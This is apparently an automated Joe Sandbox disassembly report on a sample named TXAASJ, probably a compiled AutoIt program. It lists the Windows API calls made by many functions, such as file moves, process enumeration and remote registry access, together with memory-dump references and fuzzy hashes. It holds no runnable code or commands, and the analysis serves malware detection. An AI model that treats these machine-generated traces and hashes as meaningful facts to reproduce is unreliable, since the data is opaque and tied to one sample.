                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E96A2B
                                                                                                                        • _wcscmp.LIBCMT ref: 00E96A49
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E96A62
                                                                                                                          • Part of subcall function 00E96D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00E96DBA
                                                                                                                          • Part of subcall function 00E96D6D: GetLastError.KERNEL32 ref: 00E96DC5
                                                                                                                          • Part of subcall function 00E96D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00E96DD9
                                                                                                                        • _wcscat.LIBCMT ref: 00E96AA4
                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00E96B0C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2323102230-1173974218
                                                                                                                        • Opcode ID: 33fc8f3ba7f5c7021699b3c625a5a981f86bee8534a83fdd774e01406d52c19a
                                                                                                                        • Instruction ID: d99c4fa9d10b3d59a37b3e0b44c4abab63b5c1a6d74d5c69891a38687933471a
                                                                                                                        • Opcode Fuzzy Hash: 33fc8f3ba7f5c7021699b3c625a5a981f86bee8534a83fdd774e01406d52c19a
                                                                                                                        • Instruction Fuzzy Hash: 5C3161B1800218AACF51EFB4E845BDDB7B8AF08304F5064EBE509F3141EB749B89CB64
                                                                                                                        Function 00E92FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                        • API String ID: 1038674560-2734436370
                                                                                                                        • Opcode ID: 18f4f6cf8aaf1e1e8c24feaee76f0d75c093b65180905d0b0592a24341ffa050
                                                                                                                        • Instruction ID: 7ffee28dfb3bc62620cea10db85b4ddd17d05ffb7256a1fc3a837780f6574d4e
                                                                                                                        • Opcode Fuzzy Hash: 18f4f6cf8aaf1e1e8c24feaee76f0d75c093b65180905d0b0592a24341ffa050
                                                                                                                        • Instruction Fuzzy Hash: 97213B3264821176DE31A6349C02FF7B3E89F65344F50A029FA46B7181EBA19E82C395
                                                                                                                        Function 00E917C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9180D
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E91833
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00E91836
                                                                                                                        • SysAllocString.OLEAUT32 ref: 00E91857
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00E91860
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00E9187A
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00E91888
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: ecb75a7d9b5c05abc0922f65a802160d1c7eab52e5201fbdd6b6213ac0ac8848
                                                                                                                        • Instruction ID: ea9d0bae6aec6f736e7db61edf49b1a1390ee7d38fbf255c32fbdfc9a369d4bd
                                                                                                                        • Opcode Fuzzy Hash: ecb75a7d9b5c05abc0922f65a802160d1c7eab52e5201fbdd6b6213ac0ac8848
                                                                                                                        • Instruction Fuzzy Hash: 8B217135605205AFDF149BA9DC88DBE77ECEB093647408166F915EB2A0DA70EC419B60
                                                                                                                        Function 00EBA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                          • Part of subcall function 00E6C619: GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                          • Part of subcall function 00E6C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EBA13B
                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EBA148
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EBA153
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EBA162
                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EBA16E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                        • Opcode ID: 746ccc105a3d9fd108e534d8504af96b2673d5730761985b63d3d6c37b0713ce
                                                                                                                        • Instruction ID: 24e90c1d87531d518e69325b98685abb9936fcd3596f6bb2753441655e629451
                                                                                                                        • Opcode Fuzzy Hash: 746ccc105a3d9fd108e534d8504af96b2673d5730761985b63d3d6c37b0713ce
                                                                                                                        • Instruction Fuzzy Hash: 4C11B2B115021DBEEF119F65CC86EEB7F5DEF08798F015225FA08A6090C6729C21DBA0
                                                                                                                        Function 00E6C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E6C6C0
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E6C701
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00E6C729
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E6C856
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E6C86F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1296646539-0
                                                                                                                        • Opcode ID: 9c54de571c925f7b50c6f6286b5b23a0ce46b86775c37a07a5bc13a590cdf6bf
                                                                                                                        • Instruction ID: fa5a17136b9002da81dbac5584a688193c2bb48c4309f2ab41e899fdf7cc213b
                                                                                                                        • Opcode Fuzzy Hash: 9c54de571c925f7b50c6f6286b5b23a0ce46b86775c37a07a5bc13a590cdf6bf
                                                                                                                        • Instruction Fuzzy Hash: E7B17E39A00249DBDF14CFA8D5807EDB7B1FF08754F24A12AECA9EB254DB30A941CB54
                                                                                                                        Function 00E99569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3253778849-0
                                                                                                                        • Opcode ID: 0419fee3858b8c2a99dcd1e91b6cf4856a4207e9eddc191b2bfae0a991306dcc
                                                                                                                        • Instruction ID: ea1dcbb417f01379d26cf588c2bac9933198e2439112669ed35515781ec1adb8
                                                                                                                        • Opcode Fuzzy Hash: 0419fee3858b8c2a99dcd1e91b6cf4856a4207e9eddc191b2bfae0a991306dcc
                                                                                                                        • Instruction Fuzzy Hash: 95616A3050025A9BCF11EFA4CD81AFE37E9AF45308F44A859FC5A7B292EB349909CB51
                                                                                                                        Function 00EB1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00EB1B09
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00EB1B17
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EB1B45
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcscat.LIBCMT ref: 00EB1B5A
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00EB1BD0
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00EB1BE2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1380811348-0
                                                                                                                        • Opcode ID: 6ca84e2d32c13c99fb0a378b3e9ec175ecfd95ecdf2278f991683b89c3b3342b
                                                                                                                        • Instruction ID: e2c5471abcffc7b9ca59173e81517028007156c4069fbc375229a99c38598c5b
                                                                                                                        • Opcode Fuzzy Hash: 6ca84e2d32c13c99fb0a378b3e9ec175ecfd95ecdf2278f991683b89c3b3342b
                                                                                                                        • Instruction Fuzzy Hash: D8516E715083009FD720EF24DC95EABB7E8EF88754F04595EF989A7251EB30E904CB92
                                                                                                                        Function 00EB2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB2FA0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EB2FE0
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EB3003
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EB302C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EB306F
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB307C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4046560759-0
                                                                                                                        • Opcode ID: 60552d17270739c4e667a8d981f431a983cb1f9f291711c7bc818f41ad2b6e0c
                                                                                                                        • Instruction ID: 30dd165761f2d44f822205d20f9caf1ae5b35077707c4631bef306ca73a4fdb2
                                                                                                                        • Opcode Fuzzy Hash: 60552d17270739c4e667a8d981f431a983cb1f9f291711c7bc818f41ad2b6e0c
                                                                                                                        • Instruction Fuzzy Hash: DC514A312082049FC714EF64CC95EABBBE9FF89304F04591DFA95A71A1DB71EA09CB52
                                                                                                                        Function 00E6DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$_wcscat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2037614760-0
                                                                                                                        • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                        • Instruction ID: 98b7ab6a52c245986b47609554302608a3b2e301214b2d11f6af6a72526599be
                                                                                                                        • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                        • Instruction Fuzzy Hash: 4351D230F48219AACB11AF98E841DFDB7B4EF443A4F90A04AF541BB291DB745E52D790
                                                                                                                        Function 00E92ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00E92AF6
                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00E92B68
                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00E92BC3
                                                                                                                        • _memmove.LIBCMT ref: 00E92BED
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E92C3A
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E92C68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1101466143-0
                                                                                                                        • Opcode ID: ba610db38ad639762fbca40001a84d81485604873e484f2aa758628b84693f2e
                                                                                                                        • Instruction ID: e87989ce65ce70078506f3c893fee4fe3ed4c7e8bddb41036a3badafd788f6c8
                                                                                                                        • Opcode Fuzzy Hash: ba610db38ad639762fbca40001a84d81485604873e484f2aa758628b84693f2e
                                                                                                                        • Instruction Fuzzy Hash: A85137B5A00209EFDF14CF58D880AAAB7B9FF4C314B158559EA59EB314E730E951CBA0
                                                                                                                        Function 00EB82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(?), ref: 00EB833D
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00EB8374
                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EB839C
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00EB840B
                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00EB8419
                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00EB846A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 650687236-0
                                                                                                                        • Opcode ID: d965dc1f580942d42442a40244df297d322395267e517e89152b56414e91d97a
                                                                                                                        • Instruction ID: 6951030c09e90ef14f651d345da3850016fb14b6aac0468138cda50d54539190
                                                                                                                        • Opcode Fuzzy Hash: d965dc1f580942d42442a40244df297d322395267e517e89152b56414e91d97a
                                                                                                                        • Instruction Fuzzy Hash: 61516B71A00215AFCB01EFA4DA41AEEB7F8EF48714F14945AE915BB351DB30AE41CB90
                                                                                                                        Function 00E954E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E9552E
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E95579
                                                                                                                        • IsMenu.USER32(00000000), ref: 00E95599
                                                                                                                        • CreatePopupMenu.USER32 ref: 00E955CD
                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00E9562B
                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E9565C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3311875123-0
                                                                                                                        • Opcode ID: fc1ce5717fbbf80c56868d650843500cc409a1f5f8a50d3cefd23ad69ab6998e
                                                                                                                        • Instruction ID: 91a026f098ea7834b8509ad1ef451fac5cd71a482a8012138e5291d4abe63e43
                                                                                                                        • Opcode Fuzzy Hash: fc1ce5717fbbf80c56868d650843500cc409a1f5f8a50d3cefd23ad69ab6998e
                                                                                                                        • Instruction Fuzzy Hash: 1351F072600B09EFDF22CF68D888BAEBBF5AF45318F50511DE416BB292D3708945CB51
                                                                                                                        Function 00E6B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E6B1C1
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E6B225
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00E6B242
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E6B253
                                                                                                                        • EndPaint.USER32(?,?), ref: 00E6B29D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1827037458-0
                                                                                                                        • Opcode ID: 1c6b433a5642202d04fa1ede33159ec61272be8b4946ff0ce797640a545b380d
                                                                                                                        • Instruction ID: 5b12c8b323d3c15fe4068fbec6f759f1de408e1f7c22722640a56f33aefb3a87
                                                                                                                        • Opcode Fuzzy Hash: 1c6b433a5642202d04fa1ede33159ec61272be8b4946ff0ce797640a545b380d
                                                                                                                        • Instruction Fuzzy Hash: 9341BE70144200AFC710DF25EC84FAA7BE8FB45374F044629FAA5E62A2C7319C89DB61
                                                                                                                        Function 00EBE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00F11810,00000000,?,?,00F11810,00F11810,?,00ECE2D6), ref: 00EBE21B
                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00EBE23F
                                                                                                                        • ShowWindow.USER32(00F11810,00000000,?,?,00F11810,00F11810,?,00ECE2D6), ref: 00EBE29F
                                                                                                                        • ShowWindow.USER32(?,00000004,?,?,00F11810,00F11810,?,00ECE2D6), ref: 00EBE2B1
                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00EBE2D5
                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EBE2F8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
